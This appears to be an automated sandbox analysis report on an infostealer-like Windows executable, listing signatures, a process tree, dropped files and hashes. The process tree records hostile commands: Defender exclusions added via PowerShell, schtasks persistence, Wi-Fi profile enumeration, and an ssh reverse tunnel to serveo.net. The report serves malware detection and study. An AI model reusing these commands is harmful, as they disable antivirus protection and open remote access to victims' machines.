Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-02-2024 15:16

General

  • Target

    7e9a93c69aecfc2bbda9470fbd4556db.exe

  • Size

    14KB

  • MD5

    7e9a93c69aecfc2bbda9470fbd4556db

  • SHA1

    ab0e810472a897affac1a761b49595939f6897a9

  • SHA256

    82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647

  • SHA512

    59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342

  • SSDEEP

    384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe
    "C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe"
    1⤵
    • UAC bypass
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2180
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe'; Add-MpPreference -ExclusionProcess '7e9a93c69aecfc2bbda9470fbd4556db'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2728
    • C:\Users\Admin\AppData\Local\Temp\bwcqzlfu.g5v.exe
      "C:\Users\Admin\AppData\Local\Temp\bwcqzlfu.g5v.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "bwcqzlfu.g5v" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\bwcqzlfu.g5v.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
            PID:1512
          • C:\Windows\system32\timeout.exe
            timeout /t 3
            4⤵
            • Delays execution with timeout.exe
            PID:1616
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "bwcqzlfu.g5v" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe" /rl HIGHEST /f
            4⤵
            • Creates scheduled task(s)
            PID:2912
          • C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe
            "C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe"
            4⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2680
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1864
              • C:\Windows\system32\chcp.com
                chcp 65001
                6⤵
                  PID:636
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  6⤵
                    PID:1584
                  • C:\Windows\system32\findstr.exe
                    findstr /R /C:"[ ]:[ ]"
                    6⤵
                      PID:2468
                  • C:\Windows\system32\cmd.exe
                    "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2088
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      6⤵
                        PID:1304
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show networks mode=bssid
                        6⤵
                          PID:2084
                        • C:\Windows\system32\findstr.exe
                          findstr "SSID BSSID Signal"
                          6⤵
                            PID:2256
                        • C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe
                          "C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7224 serveo.net
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2164
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {FF8DD7B9-23CC-4C32-AA5B-8A50D99FEA5A} S-1-5-21-2444714103-3190537498-3629098939-1000:DJLAPDMX\Admin:Interactive:[1]
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2836
                  • C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe
                    C:\Users\Admin\AppData\Local\RobloxSecurity\bwcqzlfu.g5v.exe
                    2⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    • outlook_office_path
                    • outlook_win_path
                    PID:2784
                    • C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe
                      "C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7224 serveo.net
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2112
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2684
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        4⤵
                          PID:1264
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          4⤵
                            PID:528
                          • C:\Windows\system32\findstr.exe
                            findstr /R /C:"[ ]:[ ]"
                            4⤵
                              PID:1176
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                            3⤵
                              PID:2944
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                4⤵
                                  PID:2764
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show networks mode=bssid
                                  4⤵
                                    PID:2904
                                  • C:\Windows\system32\findstr.exe
                                    findstr "SSID BSSID Signal"
                                    4⤵
                                      PID:1508

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\.ssh\known_hosts

                                Filesize

                                393B

                                MD5

                                18015a60cd12f33648facec1263cfafa

                                SHA1

                                31b7afd9a2dc51bfad694e5772d430fceedbac3f

                                SHA256

                                9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190

                                SHA512

                                fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

                              • C:\Users\Admin\AppData\Local\4cn9n9irdf\p.dat

                                Filesize

                                4B

                                MD5

                                b11b7e3409b27e5c6e332399362105f8

                                SHA1

                                d7931619b2a07abee5ae908504218d735d8fcc09

                                SHA256

                                17674574828520aa5f240bbbdf40521549a514c0145e431f11e494d9923073c7

                                SHA512

                                93d79ab4f0a68a6cf6ca9cb024850e36392d46976bf80d7a35933d7b17c762897bdb7ec772923f7516e09c3ad7cef4ce711bb829a066ed225a485b30bd484dba

                              • C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\libcrypto.dll

                                MD5

                                d41d8cd98f00b204e9800998ecf8427e

                                SHA1

                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                SHA256

                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                SHA512

                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                              • C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe

                                Filesize

                                584KB

                                MD5

                                3ff552d216692298dcf7390b4d96a0b4

                                SHA1

                                6ff6e3bb89396bd9ad25a165848f8e0333133cf7

                                SHA256

                                b9b417a49a24d63f59f3640f6a68ae0f299e13496247dc308cfba42ad033de86

                                SHA512

                                2ded9037271659c23c8f08f23e8e8ec16ce18a7f0a1ae4fb1fb1a79227f7d7a0bbce2c10644e4f05893bc87974f2147bc959aee35b4635b037d1bef423c83be9

                              • C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe

                                Filesize

                                192KB

                                MD5

                                3700551fa60ca626ea4c703836838e7a

                                SHA1

                                32dcbd81c2f84c9b70c129cfe71ea1799b585100

                                SHA256

                                36813f1a9f8e54a0e8e85e6069f65c08034d8af1464293d90742edf2a729b6fd

                                SHA512

                                2f5934f48f1e454b97a157e51294d70cd66bdfec4e069c1f7057858a5bacec67670c35023b5296194a662f678a55d2bfa9fc724f1fd372c0237e13bbc16df762

                              • C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe

                                Filesize

                                914KB

                                MD5

                                d1ce628a81ab779f1e8f7bf7df1bb32c

                                SHA1

                                011c90c704bb4782001d6e6ce1c647bf2bb17e01

                                SHA256

                                2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                                SHA512

                                de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                              • \Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\libcrypto.dll

                                Filesize

                                1.5MB

                                MD5

                                79a6e2268dfdba1d94c27f4b17265ff4

                                SHA1

                                b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                                SHA256

                                6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                                SHA512

                                3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                              • \Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\libcrypto.dll

                                Filesize

                                448KB

                                MD5

                                6f4ad5a4b77c17a7024559cd1b6045fb

                                SHA1

                                370aeb03091deaf194458aa71315948961212b62

                                SHA256

                                c22a2602a221282cbff7bc12fdbc55341dd29824d569d46f0d66c771613dde8d

                                SHA512

                                e5724533031f5f51d794e0088230ef6945991012e6a4962ff66e78a03f89e28196e72f831eede7828ed97628d3571bf8407139fbd4581f29ac4d44a0f6d620b1

                              • \Users\Admin\AppData\Local\Temp\bwcqzlfu.g5v.exe

                                Filesize

                                128KB

                                MD5

                                869f82df0992dc2f5155d8f69fd1c9cf

                                SHA1

                                5b48d32aca1f7705c03e2bd592f68a2b9c9a7a22

                                SHA256

                                d77412b72a893ee96e82d7efbd9fc2612176da00df5ebc066c13c303f558bcc9

                                SHA512

                                b0f0e7f6354b64cac887600690531ba93f8aeb79e746fb9848c5f16f09931e3d8b5c2ad2a617fb9c978020450b4f717f9485d468b9c6098e6f319a59b26fad19

                              • memory/2040-19-0x0000000000DE0000-0x0000000000E04000-memory.dmp

                                Filesize

                                144KB

                              • memory/2040-20-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

                                Filesize

                                9.9MB

                              • memory/2040-21-0x000000001B3A0000-0x000000001B420000-memory.dmp

                                Filesize

                                512KB

                              • memory/2040-24-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

                                Filesize

                                9.9MB

                              • memory/2180-17-0x0000000000720000-0x0000000000760000-memory.dmp

                                Filesize

                                256KB

                              • memory/2180-18-0x0000000074C60000-0x000000007534E000-memory.dmp

                                Filesize

                                6.9MB

                              • memory/2180-10-0x0000000000720000-0x0000000000760000-memory.dmp

                                Filesize

                                256KB

                              • memory/2180-0-0x0000000000250000-0x000000000025A000-memory.dmp

                                Filesize

                                40KB

                              • memory/2180-9-0x0000000074C60000-0x000000007534E000-memory.dmp

                                Filesize

                                6.9MB

                              • memory/2180-1-0x0000000074C60000-0x000000007534E000-memory.dmp

                                Filesize

                                6.9MB

                              • memory/2680-28-0x00000000003D0000-0x00000000003F4000-memory.dmp

                                Filesize

                                144KB

                              • memory/2680-30-0x000000001B3F0000-0x000000001B470000-memory.dmp

                                Filesize

                                512KB

                              • memory/2680-29-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

                                Filesize

                                9.9MB

                              • memory/2680-146-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

                                Filesize

                                9.9MB

                              • memory/2728-8-0x0000000070D00000-0x00000000712AB000-memory.dmp

                                Filesize

                                5.7MB

                              • memory/2728-7-0x00000000023D0000-0x0000000002410000-memory.dmp

                                Filesize

                                256KB

                              • memory/2728-6-0x00000000023D0000-0x0000000002410000-memory.dmp

                                Filesize

                                256KB

                              • memory/2728-5-0x0000000070D00000-0x00000000712AB000-memory.dmp

                                Filesize

                                5.7MB

                              • memory/2728-4-0x0000000070D00000-0x00000000712AB000-memory.dmp

                                Filesize

                                5.7MB

                              • memory/2784-148-0x000000001B110000-0x000000001B190000-memory.dmp

                                Filesize

                                512KB

                              • memory/2784-147-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

                                Filesize

                                9.9MB

                              • memory/2784-154-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

                                Filesize

                                9.9MB

                              • memory/2784-155-0x000000001B110000-0x000000001B190000-memory.dmp

                                Filesize

                                512KB